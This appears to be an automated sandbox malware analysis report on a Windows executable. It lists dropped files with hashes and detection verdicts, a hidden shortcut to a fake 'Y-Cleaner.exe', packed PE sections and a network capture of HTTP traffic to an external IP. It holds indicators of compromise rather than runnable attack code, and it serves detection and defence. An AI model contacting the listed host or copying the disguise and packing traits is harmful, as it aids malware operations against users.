                                                                  SSDEEP:192:R6l7wVeJGjl6z06Y93SUv1QgmfSz1zOpDM89b2psf04Sm:R6lXJIl6A6Y9SU9QgmfSz1zq2Cfl
                                                                  MD5:362D1477D38829E905AA1FA8C120C61B
                                                                  SHA1:87594C8A83987827A1248454B9331AF242E550D8
                                                                  SHA-256:4F1639B396F035A5C16BF42B4C25932DE9CB2760A08A9E9AAD82DDF866CDEFA2
                                                                  SHA-512:DAAD8A4AA345D189CDCC7DFE693A3B256DC80125953C62B343751CC253CAD3C6A7B035C3FBEE090DE73D64C9903C2BC6FC9E5D1DEE8EBB5F07F6156145E0C47C
                                                                  Malicious:false
                                                                  Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>2424</Pi
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4680
                                                                  Entropy (8bit):4.463865262497597
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsjJg77aI93cWpW8VYrYm8M4JU+Fs/+q8var1EzL1d:uIjf9I7dV7VvJ+K61EzL1d
                                                                  MD5:FCCB18AD1BB3678DD2FDF913944D5652
                                                                  SHA1:D53F1CFB004F374A2FD05E5C1623A62094AA8C26
                                                                  SHA-256:63C811B8153FA0F57923619FBD53FF4DDE736281E6C301C645146E7CCA9D9A94
                                                                  SHA-512:12139ACABE5A4674D5B03CFAB18BCBE1DCDE0B052C934FB34AB243F688A1ED5336619D759D70AAA078C96D69203724D2A2E6FC3B682281EDEC10E596445D5E21
                                                                  Malicious:false
                                                                  Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
  <src>
   <desc>
    <mach>
     <os>
      <arg nm="vermaj" val="10" />
      <arg nm="vermin" val="0" />
      <arg nm="verbld" val="19045" />
      <arg nm="vercsdbld" val="2006" />
      <arg nm="verqfe" val="2006" />
      <arg nm="csdbld" val="2006" />
      <arg nm="versp" val="0" />
      <arg nm="arch" val="9" />
      <arg nm="lcid" val="2057" />
      <arg nm="geoid" val="223" />
      <arg nm="sku" val="48" />
      <arg nm="domain" val="0" />
      <arg nm="prodsuite" val="256" />
      <arg nm="ntprodtype" val="1" />
      <arg nm="platid" val="2" />
      <arg nm="tmsi" val="639746" />
      <arg nm="osinsty" val="1" />
      <arg nm="iever" val="11.789.19041.0-11.0.1000" />
      <arg nm="portos" val="0" />
      <arg nm="ram" val="409
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:0
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214000
                                                                  Entropy (8bit):6.5511536448557735
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Z5G1b0q6QpxILDXGGMOmMjMpI6qe9C5jwQw2hWHcH0:SIQpxILDXGGMO7Ice9C5kQw2hWHcH0
                                                                  MD5:6F0C19CD2E68B52C50BFD34A733C3524
                                                                  SHA1:3542EEC360C3812863D28A12AF96C31BC9CC0164
                                                                  SHA-256:7EA56914148B572BAAADA38008CD70846A7240737B242BC8AC421531EF347632
                                                                  SHA-512:F9DAAF33BA25E5046CB459AB9D4198BCD3ACCC738C5E127D7B8FDC25FC18FF966B569747B241CA8DA1DFE0066E8D443B950019D31BD96A9D901D9FE4167190EC
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1502720
                                                                  Entropy (8bit):7.646111739368707
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Joe Sandbox View:
                                                                  • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                                  • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97296
                                                                  Entropy (8bit):7.9982317718947025
                                                                  Encrypted:true
                                                                  SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                  MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                  SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                  SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                  SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21
                                                                  Entropy (8bit):3.880179922675737
                                                                  Encrypted:false
                                                                  SSDEEP:3:gFsR0GOWW:gyRhI
                                                                  MD5:408E94319D97609B8E768415873D5A14
                                                                  SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                  SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                  SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                  Malicious:false
                                                                  Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214000
                                                                  Entropy (8bit):6.5511536448557735
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Z5G1b0q6QpxILDXGGMOmMjMpI6qe9C5jwQw2hWHcH0:SIQpxILDXGGMO7Ice9C5kQw2hWHcH0
                                                                  MD5:6F0C19CD2E68B52C50BFD34A733C3524
                                                                  SHA1:3542EEC360C3812863D28A12AF96C31BC9CC0164
                                                                  SHA-256:7EA56914148B572BAAADA38008CD70846A7240737B242BC8AC421531EF347632
                                                                  SHA-512:F9DAAF33BA25E5046CB459AB9D4198BCD3ACCC738C5E127D7B8FDC25FC18FF966B569747B241CA8DA1DFE0066E8D443B950019D31BD96A9D901D9FE4167190EC
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1502720
                                                                  Entropy (8bit):7.646111739368707
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:24:02 2024, mtime=Fri Dec 20 14:24:02 2024, atime=Fri Dec 20 14:24:02 2024, length=1502720, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2191
                                                                  Entropy (8bit):3.8707374337748166
                                                                  Encrypted:false
                                                                  SSDEEP:24:8dLs/e8RmgKzjaGUAKfloIvNQM9oO4ZloOqxgxjNrNHqyFm:81cxRueKG5vNQM9oZhqupNrNKyF
                                                                  MD5:7E2F8A39ADA00DFAE676AD87D04F56B9
                                                                  SHA1:946B866A4630823C8C332AFE385421A123A9AA87
                                                                  SHA-256:1E35380104E910B8D5CFDEFD2D2C5C69718C81DE186C4C875499E74AC0963484
                                                                  SHA-512:3330D89F6394AD6167CFCC42E644176E268018CDB5B47524DBC409207995A1E1136FFE61FD744134B0109FDE8687CD41074DF56D6FA11E461B9BE8E70E1ECBBF
                                                                  Malicious:false
                                                                  Preview:L..................F.@.. ....'.3.R...'.3.R...'.3.R..........................:.:..DG..Yr?.D..U..k0.&...&......vk.v...._.7..R.....3.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.z...........................%..A.p.p.D.a.t.a...B.P.1......Y.z..Local.<......CW.^.Y.z....b.......................^.L.o.c.a.l.....N.1......Y.z..Temp..:......CW.^.Y.z....l.....................eB..T.e.m.p.....v.1......Y.z..EDE426~1..^......Y.z.Y.z..............................e.D.e.4.2.6.5.J.8.0.S.w.d.w.r.e.J.A.5.D.K.e.....h.2......Y.{ .Y-CLEA~1.EXE..L......Y.{.Y.{....R.........................Y.-.C.l.e.a.n.e.r...e.x.e.......u...............-.......t............).y.....C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.:.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.D.e.4.2.6.5.J.8.0.S.w.d.w.r.e.J.A.5.D.K.e.\.Y.-.C.l.e.a.n.e.r...e.x.e.F.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.D.e.4
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.465456716179802
                                                                  Encrypted:false
                                                                  SSDEEP:6144:sIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNrdwBCswSb9:RXD94+WlLZMM6YFHN+9
                                                                  MD5:FAB83FD871BB6ADE561AA1FD9311DBBF
                                                                  SHA1:B64821643F47CC6E0D3B948659A59776BEE038EF
                                                                  SHA-256:2C64384B077C49D4D76C5E39278BAC1E0605DEDA93535896DB54313557ED2A49
                                                                  SHA-512:D0D0A6F5899A6B47C1875A4E06D1DD90622C5F5AB0D8639C457D9D5BBEB8D6FEB13B368364BCA7EDF763AD989F88864EF7AF9B7BEFD3D63FF69DC57B3C0988D4
                                                                  Malicious:false
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.940815632628404
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:zmTSHkabY6.exe
                                                                  File size:1'945'088 bytes
                                                                  MD5:cab7af24073c5c1c62a2957dd5983c98
                                                                  SHA1:a41a42e84999503cf76b04edefe3c37f87023285
                                                                  SHA256:83709123b921be43ef4f8bcab88738b7e3f6b810fb443da8f447a287fa5d86ae
                                                                  SHA512:ab369b7290203e5fbbaa67a84fcac6325d1460e5696a8d6c54595cf85a1e63b5fb513e5bc8bc5fdf17dce02431c2368a5faefeee131c879085a340844734c6e8
                                                                  SSDEEP:49152:/4bMkF3zAefWvY4WxDwLPDCH/ixLCDTni2zfkwNMb:wQkF3zAeuvYhDy2H/iLCDTni2zu
                                                                  TLSH:B99533A21E93D8A4EDB00573716B8A6779C2B018D540AB6FE688D71DDDB31D3E243B1C
                                                                  Icon Hash:e7a99a8a8651790c
                                                                  Entrypoint:0xc5e000
                                                                  Entrypoint Section:.taggant
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                  Instruction
                                                                  Programming Language:
                                                                  • [C++] VS2008 build 21022
                                                                  • [ASM] VS2008 build 21022
                                                                  • [ C ] VS2008 build 21022
                                                                  • [IMP] VS2005 build 50727
                                                                  • [RES] VS2008 build 21022
                                                                  • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x41805b | 0x6f | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40d000 | 0xaea0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x85589c | 0x18 | mimgnztd |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x40c000 | 0x24e00 | d2a2e18332da2cb0f93d9ef5cedbf9cf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x40d000 | 0xaea0 | 0x7000 | 72332cb18b74711f6db3d69a316efdd0 | False | 0.9675990513392857 | data | 7.897656971407287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x418000 | 0x1000 | 0x200 | b8539b83d0b3f253ed2a56b71af0554b | False | 0.154296875 | data | 1.085758102617974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x419000 | 0x298000 | 0x200 | 69a10050e9b393cfa3c0e61fa5aed286 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| mimgnztd | 0x6b1000 | 0x1ac000 | 0x1ab600 | 65f0f49848bad21dc900040979c56bfa | False | 0.9899864498025739 | data | 7.947730998913052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| korrylev | 0x85d000 | 0x1000 | 0x400 | 6708767d8c3e730ce3ece8b9b5599802 | False | 0.7939453125 | data | 6.232159219538265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x85e000 | 0x3000 | 0x2200 | 177d20ab148622e0d3749ccaac2139e8 | False | 0.06410845588235294 | DOS executable (COM) | 0.7663392544881751 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_ICON | 0x8558fc | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.7971748400852878 |
| RT_ICON | 0x8567a4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.7838447653429603 |
| RT_ICON | 0x85704c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7200460829493087 |
| RT_ICON | 0x857714 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.740606936416185 |
| RT_ICON | 0x857c7c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.6840248962655602 |
| RT_ICON | 0x85a224 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.7345215759849906 |
| RT_ICON | 0x85b2cc | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.7622950819672131 |
| RT_ICON | 0x85bc54 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8111702127659575 |
| RT_STRING | 0x413c80 | 0x330 | data | | | 0.8345588235294118 |
| RT_STRING | 0x413fb0 | 0x170 | data | | | 0.15 |
| RT_STRING | 0x414120 | 0x620 | empty | | | 0 |
| RT_STRING | 0x414740 | 0x762 | empty | | | 0 |
| RT_STRING | 0x414ea4 | 0x852 | empty | | | 0 |
| RT_STRING | 0x4156f8 | 0x726 | empty | | | 0 |
| RT_STRING | 0x415e20 | 0x658 | empty | | | 0 |
| RT_STRING | 0x416478 | 0x6c0 | empty | | | 0 |
| RT_STRING | 0x416b38 | 0x638 | empty | | | 0 |
| RT_STRING | 0x417170 | 0x88a | empty | | | 0 |
| RT_ACCELERATOR | 0x4179fc | 0x20 | empty | | | 0 |
| RT_GROUP_ICON | 0x85c0bc | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424 |
| RT_VERSION | 0x85c132 | 0x1b4 | data | | | 0.5711009174311926 |
| RT_MANIFEST | 0x85c2e6 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Language of compilation system | Country where language is spoken | Map |
| Turkmen | Turkmenistan | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                  Dec 20, 2024 16:23:16.703347921 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.703347921 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.703383923 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.703480959 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.711236000 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.711343050 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.711606026 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.711776972 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.719445944 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.719531059 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.719800949 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.720088005 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.896787882 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.896891117 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.896935940 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.897011042 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.900500059 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.900568962 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.900634050 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.900687933 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.908478975 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.908663034 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.908665895 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.908746004 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.916408062 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.916527033 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.916534901 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.916604042 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.924464941 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.924545050 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.924674988 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.924762964 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.932387114 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.932538986 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.932595015 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.932676077 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.940505028 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.940681934 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.940907955 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.941003084 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.948442936 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.948585987 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.948647022 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.948702097 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.956439972 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.956525087 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.956537008 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.956609011 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.964464903 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.964627981 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.964687109 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.964687109 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.973104000 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.973191023 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.973208904 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.973251104 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.980760098 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.980839968 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.980889082 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.980921984 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:17.088285923 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:17.088444948 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:17.088480949 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:17.088525057 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:17.090117931 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:17.090275049 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:17.090404034 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:17.090487957 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:17.097029924 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:17.097116947 CET4974780192.168.2.4185.156.73.23
